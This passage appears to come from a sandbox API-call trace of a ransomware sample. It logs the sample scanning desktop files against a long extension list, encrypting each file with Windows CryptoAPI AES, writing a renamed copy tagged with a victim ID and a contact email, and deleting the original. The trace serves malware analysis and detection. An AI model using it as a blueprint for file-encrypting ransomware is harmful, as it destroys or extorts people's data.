x.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ots") returned=".ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.325] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.325] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.325] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.367] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x18410, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x18410, lpOverlapped=0x0) returned 1
	[0182.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.371] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0182.374] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.374] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0182.374] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.374] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.374] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.374] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0182.375] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.375] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x18410, dwBufLen=0x18410 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x18420) returned 1
	[0182.380] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.380] RtlMoveMemory (in: Destination=0xff5598, Source=0xfdd180, Length=0x18410 | out: Destination=0xff5598) 
	[0182.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.381] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff5598*, pdwDataLen=0x18bc0c*=0x18410, dwBufLen=0x18420 | out: pbData=0xff5598*, pdwDataLen=0x18bc0c*=0x18420) returned 1
	[0182.383] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.383] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0182.384] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.384] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0182.384] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.384] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0182.384] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.384] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.385] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.385] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0182.386] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0182.386] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.387] WriteFile (in: hFile=0x388, lpBuffer=0xff5598*, nNumberOfBytesToWrite=0x18420, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff5598*, lpNumberOfBytesWritten=0x18c068*=0x18420, lpOverlapped=0x0) returned 1
	[0182.395] CloseHandle (hObject=0x388) returned 1
	[0182.396] CloseHandle (hObject=0x384) returned 1
	[0182.396] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots")) returned 1
	[0182.404] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots")) returned 0
	[0182.404] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c01cfd0, ftCreationTime.dwHighDateTime=0x1d9676d, ftLastAccessTime.dwLowDateTime=0xea3fead0, ftLastAccessTime.dwHighDateTime=0x1d96b0b, ftLastWriteTime.dwLowDateTime=0xea3fead0, ftLastWriteTime.dwHighDateTime=0x1d96b0b, nFileSizeHigh=0x0, nFileSizeLow=0x93ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pulmow9bvN4HAF5vV1.gif", cAlternateFileName="PULMOW~1.GIF")) returned 1
	[0182.404] lstrcmpW (lpString1="Pulmow9bvN4HAF5vV1.gif", lpString2="..") returned 1
	[0182.405] lstrcmpW (lpString1="Pulmow9bvN4HAF5vV1.gif", lpString2=".") returned 1
	[0182.405] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.405] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="Pulmow9bvN4HAF5vV1.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Pulmow9bvN4HAF5vV1.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Pulmow9bvN4HAF5vV1.gif"
	[0182.405] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Pulmow9bvN4HAF5vV1.gif") returned 52
	[0182.405] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.405] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Pulmow9bvN4HAF5vV1.gif", cchLength=0x34 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif") returned 0x34
	[0182.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.406] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.406] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif") returned="c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif"
	[0182.406] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif") returned 52
	[0182.406] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.406] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.406] StrStrW (lpFirst=".gif", lpSrch=".") returned=".gif"
	[0182.406] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.408] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".gif") 